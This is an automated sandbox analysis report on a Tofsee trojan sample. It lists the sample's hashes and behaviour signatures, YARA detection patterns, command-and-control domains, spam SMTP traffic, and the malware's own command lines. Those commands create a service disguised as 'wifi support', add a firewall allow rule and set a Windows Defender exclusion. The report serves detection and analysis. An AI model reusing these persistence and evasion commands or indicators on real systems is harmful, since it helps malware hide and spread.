
Windows Analysis Report
874A7cigvX.exe

Overview

General Information

Sample name: 874A7cigvX.exe (renamed because the original name is a hash value)
Original sample name: Trojan.Autorun.ATA_virussign.com_f7ae445081e10267d2cec9b6b0e2d375.exe
Analysis ID: 1506014
MD5: f7ae445081e10267d2cec9b6b0e2d375
SHA1: e12892ea4d092e4b959617c6d00356ee23da0797
SHA256: 569edae4e4c7f5df590c7ee0a96210942e2be22be73beda9bc1528addca234f4

Detection

Tofsee
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Tofsee
AI detected suspicious sample
Adds extensions / path to Windows Defender exclusion list (Registry)
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Deletes itself after installation
Drops executables to the windows directory (C:\Windows) and starts them
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the windows firewall
Sigma detected: Suspect Svchost Activity
Sigma detected: Suspicious New Service Creation
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query network adapter information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Windows Defender Exclusions Added - Registry
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 874A7cigvX.exe (PID: 2796 cmdline: "C:\Users\user\Desktop\874A7cigvX.exe" MD5: F7AE445081E10267D2CEC9B6B0E2D375)
    • cmd.exe (PID: 3472 cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ycgeofkw\ MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3712 cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\xvkslbws.exe" C:\Windows\SysWOW64\ycgeofkw\ MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6552 cmdline: "C:\Windows\System32\sc.exe" create ycgeofkw binPath= "C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe /d\"C:\Users\user\Desktop\874A7cigvX.exe\"" type= own start= auto DisplayName= "wifi support" MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
      • conhost.exe (PID: 6172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6728 cmdline: "C:\Windows\System32\sc.exe" description ycgeofkw "wifi internet conection" MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
      • conhost.exe (PID: 5268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 984 cmdline: "C:\Windows\System32\sc.exe" start ycgeofkw MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
      • conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • netsh.exe (PID: 4508 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • conhost.exe (PID: 2724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • xvkslbws.exe (PID: 1440 cmdline: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe /d"C:\Users\user\Desktop\874A7cigvX.exe" MD5: 702317DA74C3C1D30ED61EA3A7D7DFCD)
    • svchost.exe (PID: 6204 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • cleanup
Name: Tofsee
Description: According to PCrisk, Tofsee (also known as Gheg) is a malicious Trojan-type program that is capable of performing DDoS attacks, mining cryptocurrency, sending emails, stealing various account credentials, updating itself, and more. Cyber criminals mainly use this program as an email-oriented tool (they target users' email accounts), however, having Tofsee installed can also lead to many other problems.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.tofsee
{"C2 list": ["vanaheim.cn:443", "jotunheim.name:443"]}
Source | Rule | Description | Author | Strings
00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security
00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Tofsee_26124fe4 | unknown | unknown
  • 0x27ab:$a: 55 8B EC 8B 45 08 57 8B 7D 10 B1 01 85 FF 74 1D 56 8B 75 0C 2B F0 8A 14 06 32 55 14 88 10 8A D1 02 55 18 F6 D9 00 55 14 40 4F 75 EA 5E 8B 45 08 5F 5D C3
  • 0xf0fc:$b: 8B 44 24 04 53 8A 18 84 DB 74 2D 8B D0 2B 54 24 0C 8B 4C 24 0C 84 DB 74 12 8A 19 84 DB 74 1B 38 1C 0A 75 07 41 80 3C 0A 00 75 EE 80 39 00 74 0A 40 8A 18 42 84 DB 75 D9 33 C0 5B C3
0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security
0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp | Windows_Trojan_Tofsee_26124fe4 | unknown | unknown
  • 0x2544:$a: 55 8B EC 8B 45 08 57 8B 7D 10 B1 01 85 FF 74 1D 56 8B 75 0C 2B F0 8A 14 06 32 55 14 88 10 8A D1 02 55 18 F6 D9 00 55 14 40 4F 75 EA 5E 8B 45 08 5F 5D C3
  • 0xee95:$b: 8B 44 24 04 53 8A 18 84 DB 74 2D 8B D0 2B 54 24 0C 8B 4C 24 0C 84 DB 74 12 8A 19 84 DB 74 1B 38 1C 0A 75 07 41 80 3C 0A 00 75 EE 80 39 00 74 0A 40 8A 18 42 84 DB 75 D9 33 C0 5B C3
Source | Rule | Description | Author | Strings
0.2.874A7cigvX.exe.2610e67.1.unpack | Windows_Trojan_Tofsee_26124fe4 | unknown | unknown
  • 0xd44:$a: 55 8B EC 8B 45 08 57 8B 7D 10 B1 01 85 FF 74 1D 56 8B 75 0C 2B F0 8A 14 06 32 55 14 88 10 8A D1 02 55 18 F6 D9 00 55 14 40 4F 75 EA 5E 8B 45 08 5F 5D C3
  • 0xd695:$b: 8B 44 24 04 53 8A 18 84 DB 74 2D 8B D0 2B 54 24 0C 8B 4C 24 0C 84 DB 74 12 8A 19 84 DB 74 1B 38 1C 0A 75 07 41 80 3C 0A 00 75 EE 80 39 00 74 0A 40 8A 18 42 84 DB 75 D9 33 C0 5B C3
0.2.874A7cigvX.exe.2610e67.1.unpack | MALWARE_Win_Tofsee | Detects Tofsee | ditekSHen
  • 0xe110:$s2: loader_id
  • 0xe140:$s3: start_srv
  • 0xe170:$s4: lid_file_upd
  • 0xe164:$s5: localcfg
  • 0xe894:$s6: Incorrect respons
12.2.xvkslbws.exe.2d70e67.1.unpack | Windows_Trojan_Tofsee_26124fe4 | unknown | unknown
  • 0xd44:$a: 55 8B EC 8B 45 08 57 8B 7D 10 B1 01 85 FF 74 1D 56 8B 75 0C 2B F0 8A 14 06 32 55 14 88 10 8A D1 02 55 18 F6 D9 00 55 14 40 4F 75 EA 5E 8B 45 08 5F 5D C3
  • 0xd695:$b: 8B 44 24 04 53 8A 18 84 DB 74 2D 8B D0 2B 54 24 0C 8B 4C 24 0C 84 DB 74 12 8A 19 84 DB 74 1B 38 1C 0A 75 07 41 80 3C 0A 00 75 EE 80 39 00 74 0A 40 8A 18 42 84 DB 75 D9 33 C0 5B C3
12.2.xvkslbws.exe.2d70e67.1.unpack | MALWARE_Win_Tofsee | Detects Tofsee | ditekSHen
  • 0xe110:$s2: loader_id
  • 0xe140:$s3: start_srv
  • 0xe170:$s4: lid_file_upd
  • 0xe164:$s5: localcfg
  • 0xe894:$s6: Incorrect respons
0.2.874A7cigvX.exe.400000.0.unpack | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security

        System Summary

Source: Process started | Author: David Burkett, @signalblur | Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe /d"C:\Users\user\Desktop\874A7cigvX.exe", ParentImage: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe, ParentProcessId: 1440, ParentProcessName: xvkslbws.exe, ProcessCommandLine: svchost.exe, ProcessId: 6204, ProcessName: svchost.exe
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\sc.exe" create ycgeofkw binPath= "C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe /d\"C:\Users\user\Desktop\874A7cigvX.exe\"" type= own start= auto DisplayName= "wifi support", CommandLine: "C:\Windows\System32\sc.exe" create ycgeofkw binPath= "C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe /d\"C:\Users\user\Desktop\874A7cigvX.exe\"" type= own start= auto DisplayName= "wifi support", CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\874A7cigvX.exe", ParentImage: C:\Users\user\Desktop\874A7cigvX.exe, ParentProcessId: 2796, ParentProcessName: 874A7cigvX.exe, ProcessCommandLine: "C:\Windows\System32\sc.exe" create ycgeofkw binPath= "C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe /d\"C:\Users\user\Desktop\874A7cigvX.exe\"" type= own start= auto DisplayName= "wifi support", ProcessId: 6552, ProcessName: sc.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 52.101.42.0, DestinationIsIpv6: false, DestinationPort: 25, EventID: 3, Image: C:\Windows\SysWOW64\svchost.exe, Initiated: true, ProcessId: 6204, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49705
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe /d"C:\Users\user\Desktop\874A7cigvX.exe", ParentImage: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe, ParentProcessId: 1440, ParentProcessName: xvkslbws.exe, ProcessCommandLine: svchost.exe, ProcessId: 6204, ProcessName: svchost.exe
Source: Registry Key set | Author: Christian Burkard (Nextron Systems) | Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\svchost.exe, ProcessId: 6204, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\SysWOW64\ycgeofkw
Source: Process started | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community | Data: Command: "C:\Windows\System32\sc.exe" create ycgeofkw binPath= "C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe /d\"C:\Users\user\Desktop\874A7cigvX.exe\"" type= own start= auto DisplayName= "wifi support", CommandLine: "C:\Windows\System32\sc.exe" create ycgeofkw binPath= "C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe /d\"C:\Users\user\Desktop\874A7cigvX.exe\"" type= own start= auto DisplayName= "wifi support", CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\874A7cigvX.exe", ParentImage: C:\Users\user\Desktop\874A7cigvX.exe, ParentProcessId: 2796, ParentProcessName: 874A7cigvX.exe, ProcessCommandLine: "C:\Windows\System32\sc.exe" create ycgeofkw binPath= "C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe /d\"C:\Users\user\Desktop\874A7cigvX.exe\"" type= own start= auto DisplayName= "wifi support", ProcessId: 6552, ProcessName: sc.exe
        No Suricata rule has matched


        AV Detection

Source: vanaheim.cn:443 | Avira URL Cloud: Label: phishing
Source: jotunheim.name:443 | Avira URL Cloud: Label: malware
Source: 12.2.xvkslbws.exe.400000.0.unpack | Malware Configuration Extractor: Tofsee {"C2 list": ["vanaheim.cn:443", "jotunheim.name:443"]}
Source: vanaheim.cn | Virustotal: Detection: 15%
Source: vanaheim.cn:443 | Virustotal: Detection: 7%
Source: jotunheim.name:443 | Virustotal: Detection: 12%
Source: 874A7cigvX.exe | Virustotal: Detection: 67%
Source: 874A7cigvX.exe | ReversingLabs: Detection: 68%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\AppData\Local\Temp\xvkslbws.exe | Joe Sandbox ML: detected
Source: 874A7cigvX.exe | Joe Sandbox ML: detected

        Compliance

Source: C:\Users\user\Desktop\874A7cigvX.exe | Unpacked PE file: 0.2.874A7cigvX.exe.400000.0.unpack
Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe | Unpacked PE file: 12.2.xvkslbws.exe.400000.0.unpack
Source: 874A7cigvX.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\874A7cigvX.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

        Change of critical system settings

Source: C:\Windows\SysWOW64\svchost.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\ycgeofkw

        Networking

Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 217.69.139.150 25
Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 77.232.41.29 443
Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 52.101.42.0 25
Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 64.233.166.26 25
Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 67.195.204.74 25
Source: Malware configuration extractor | URLs: vanaheim.cn:443
Source: Malware configuration extractor | URLs: jotunheim.name:443
Source: Joe Sandbox View | IP Address: 52.101.42.0 52.101.42.0
Source: Joe Sandbox View | IP Address: 217.69.139.150 217.69.139.150
Source: Joe Sandbox View | IP Address: 77.232.41.29 77.232.41.29
Source: Joe Sandbox View | IP Address: 67.195.204.74 67.195.204.74
Source: Joe Sandbox View | ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
Source: Joe Sandbox View | ASN Name: MAILRU-ASMailRuRU MAILRU-ASMailRuRU
Source: Joe Sandbox View | ASN Name: EUT-ASEUTIPNetworkRU EUT-ASEUTIPNetworkRU
Source: Joe Sandbox View | ASN Name: YAHOO-3US YAHOO-3US
Source: global traffic | TCP traffic: 192.168.2.5:49705 -> 52.101.42.0:25
Source: global traffic | TCP traffic: 192.168.2.5:49712 -> 67.195.204.74:25
Source: global traffic | TCP traffic: 192.168.2.5:49713 -> 64.233.166.26:25
Source: global traffic | TCP traffic: 192.168.2.5:49716 -> 217.69.139.150:25
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\874A7cigvX.exe | Code function: 0_2_00402A62 GetProcessHeap,GetProcessHeap,GetProcessHeap,HeapAlloc,socket,htons,select,recv,htons,htons,htons,GetProcessHeap,HeapAlloc,htons,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,closesocket,GetProcessHeap,HeapFree | 0_2_00402A62
Source: global traffic | DNS traffic detected: DNS query: microsoft-com.mail.protection.outlook.com
Source: global traffic | DNS traffic detected: DNS query: vanaheim.cn
Source: global traffic | DNS traffic detected: DNS query: yahoo.com
Source: global traffic | DNS traffic detected: DNS query: mta7.am0.yahoodns.net
Source: global traffic | DNS traffic detected: DNS query: google.com
Source: global traffic | DNS traffic detected: DNS query: smtp.google.com
Source: global traffic | DNS traffic detected: DNS query: mail.ru
Source: global traffic | DNS traffic detected: DNS query: mxs.mail.ru
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714

        Spam, unwanted Advertisements and Ransom Demands

Source: Yara match | File source: 0.2.874A7cigvX.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.874A7cigvX.exe.2630000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.svchost.exe.30f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.xvkslbws.exe.2d70e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.xvkslbws.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.874A7cigvX.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.874A7cigvX.exe.2610e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.xvkslbws.exe.2df0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.xvkslbws.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.3.xvkslbws.exe.2d90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.svchost.exe.30f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.xvkslbws.exe.2df0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2086603974.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000003.2084057057.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2046211067.0000000002630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 874A7cigvX.exe PID: 2796, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: xvkslbws.exe PID: 1440, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 6204, type: MEMORYSTR

        System Summary

Source: 0.2.874A7cigvX.exe.2610e67.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
Source: 0.2.874A7cigvX.exe.2610e67.1.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee Author: ditekSHen
Source: 12.2.xvkslbws.exe.2d70e67.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
Source: 12.2.xvkslbws.exe.2d70e67.1.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee Author: ditekSHen
Source: 0.2.874A7cigvX.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
Source: 0.2.874A7cigvX.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee Author: ditekSHen
Source: 0.3.874A7cigvX.exe.2630000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
Source: 0.3.874A7cigvX.exe.2630000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee Author: ditekSHen
Source: 15.2.svchost.exe.30f0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
Source: 15.2.svchost.exe.30f0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee Author: ditekSHen
Source: 12.2.xvkslbws.exe.2d70e67.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
Source: 12.2.xvkslbws.exe.2d70e67.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee Author: ditekSHen
Source: 12.2.xvkslbws.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
Source: 12.2.xvkslbws.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee Author: ditekSHen
Source: 0.3.874A7cigvX.exe.2630000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
Source: 0.3.874A7cigvX.exe.2630000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee Author: ditekSHen
Source: 0.2.874A7cigvX.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
Source: 0.2.874A7cigvX.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee Author: ditekSHen
Source: 0.2.874A7cigvX.exe.2610e67.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
Source: 0.2.874A7cigvX.exe.2610e67.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee Author: ditekSHen
Source: 12.2.xvkslbws.exe.2df0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
Source: 12.2.xvkslbws.exe.2df0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee Author: ditekSHen
Source: 12.2.xvkslbws.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
Source: 12.2.xvkslbws.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee Author: ditekSHen
Source: 12.3.xvkslbws.exe.2d90000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
Source: 12.3.xvkslbws.exe.2d90000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee Author: ditekSHen
Source: 15.2.svchost.exe.30f0000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
Source: 15.2.svchost.exe.30f0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee Author: ditekSHen
Source: 12.2.xvkslbws.exe.2df0000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
Source: 12.2.xvkslbws.exe.2df0000.2.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee Author: ditekSHen
Source: 12.3.xvkslbws.exe.2d90000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
Source: 12.3.xvkslbws.exe.2d90000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee Author: ditekSHen
Source: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
Source: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
Source: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY | Matched rule: Detects Tofsee Author: ditekSHen
Source: 0000000C.00000002.2086603974.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
Source: 0000000C.00000002.2086603974.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Tofsee Author: ditekSHen
Source: 0000000C.00000002.2086252389.0000000002622000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
Source: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
Source: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Tofsee Author: ditekSHen
Source: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
Source: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Detects Tofsee Author: ditekSHen
Source: 0000000C.00000003.2084057057.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
Source: 0000000C.00000003.2084057057.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Tofsee Author: ditekSHen
Source: 00000000.00000002.2081266908.0000000002669000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000003.2046211067.0000000002630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
Source: 00000000.00000003.2046211067.0000000002630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Tofsee Author: ditekSHen
Source: C:\Users\user\Desktop\874A7cigvX.exe | Code function: 0_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle | 0_2_00408E26
Source: C:\Users\user\Desktop\874A7cigvX.exe | Code function: 0_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError | 0_2_00401280
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\SysWOW64\ycgeofkw\
Source: C:\Users\user\Desktop\874A7cigvX.exe | Code function: 0_2_0040C913 | 0_2_0040C913
Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe | Code function: 12_2_0040C913 | 12_2_0040C913
